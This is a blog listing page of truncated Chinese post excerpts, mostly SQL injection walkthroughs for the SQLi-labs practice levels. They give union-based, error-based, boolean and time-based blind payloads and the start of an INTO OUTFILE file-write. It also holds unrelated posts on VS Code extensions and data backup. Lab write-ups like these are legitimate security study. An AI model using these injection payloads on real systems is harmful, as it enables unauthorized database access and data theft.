台部落i_momoe

11關爲POST提交則我們可以藉助工具：BurpLoader 將瀏覽器設置代理爲127.0.0.1 在Burploader中設置代理在其中添加 127.0.0.1:8080 並在前方的Running複選框打上勾在工具中打開攔截

2020-06-24 14:55:57

主要是爲了自己留個檔哈哈哈哈哈哈哈哈哈 vscode-icons：圖標 Code Runner：好多語言的運行環境 Chinese(Simplified)Language：中文翻譯 C/C++：C的環境 Bracket Pair Co

2020-06-24 14:55:57

?id=1"--+ 構造閉合 SQLI DUMB SERIES-6沒有回顯這裏使用報錯型 ?id=-1" AND(SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT(SELECT CONCAT(C

2020-06-24 14:55:57

由於沒有回顯且作者希望我們使用outfile所以我們使用mysql中的 select into outfile語句將結果輸出到指定的文件中 ?id=1'))--+ 構造閉合 ?id=1')) union all select 1,2,'<

2020-06-24 14:55:57

SQLI DUMB SERIES-2思路 ?id=-1 union all select 1,database(),3 from users --+ ?id=-1 select 1,group_concat(table_name

2020-06-24 14:55:57

SQLI DUMB SERIES-8思路 ?id=1'--+ 構造閉合發現沒有回顯則我們使用盲注盲注分爲幾種布爾型盲注 Length() //返回字符串長度 Substr() //取字符串用法同下 mid() //mid(ABC

2020-06-24 14:55:57

閉合聯合查詢設行 # 使用-1是爲了讓值被判斷爲false 不輸出 group_concat(); //將列的內容橫向輸出 information_schema //系統數據庫 information_schema.schem

2020-06-24 14:55:57

SQLI DUMB SERIES-1思路首先判斷要輸入的是否爲整型（整型不需要構造閉合可以直接改變邏輯） ?id=1 and 1=1/?id=1 and 1=2 查看邏輯對錯是否改變回顯，判斷數據庫交互邏輯錯誤不返回值邏輯

2020-06-24 14:55:57

?id=1'--+ 構造閉合 SQLI DUMB SERIES-5沒有回顯這裏使用報錯型 ?id=-1' AND(SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT(SELECT CONCAT(C

2020-06-24 14:55:57

?id=1" 報錯 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for

2020-06-24 14:55:57

此處沒有回顯所以通過別的函數來檢測閉合是否構造 sleep() 如果執行沉睡4秒 ?id=1' and sleep(4)--+ 頁面延遲輸出所以sleep被執行所以構造閉合成功猜庫名 ?id=1' and if(asc

2020-06-24 14:55:57

第十關的步驟與第九關相同可以查看之前的第九關打法 SQLI DUMB SERIES-9 //猜庫名 ?id=1' and if(ascii(substr(database(),1,1))=115,sleep(2),0)--+ //

2020-06-24 14:55:46

?id=1’) 構造閉合 ?id=1’) --+ 註釋後面內容 ?id=1’) order by 4–+ 4報錯 3不報錯故有3列 ?id=-1’) union all select 1,2,3 from users–+ 在

2020-06-24 14:55:46

祝大家2019春節快樂啦！祝大家2019不再有BUG！

2019-02-02 14:41:15

數據備份數據備份是容災的基礎，是指爲防止系統出現操作失誤或系統故障導致數據丟失，而將全部或部分數據集合從應用主機的硬盤或陣列複製到其它的存儲介質的過程。傳統的數據備份主要是採用內置或外置的磁帶機進行冷備份。但是這種方式只能防止操作失誤等

2019-02-01 15:44:33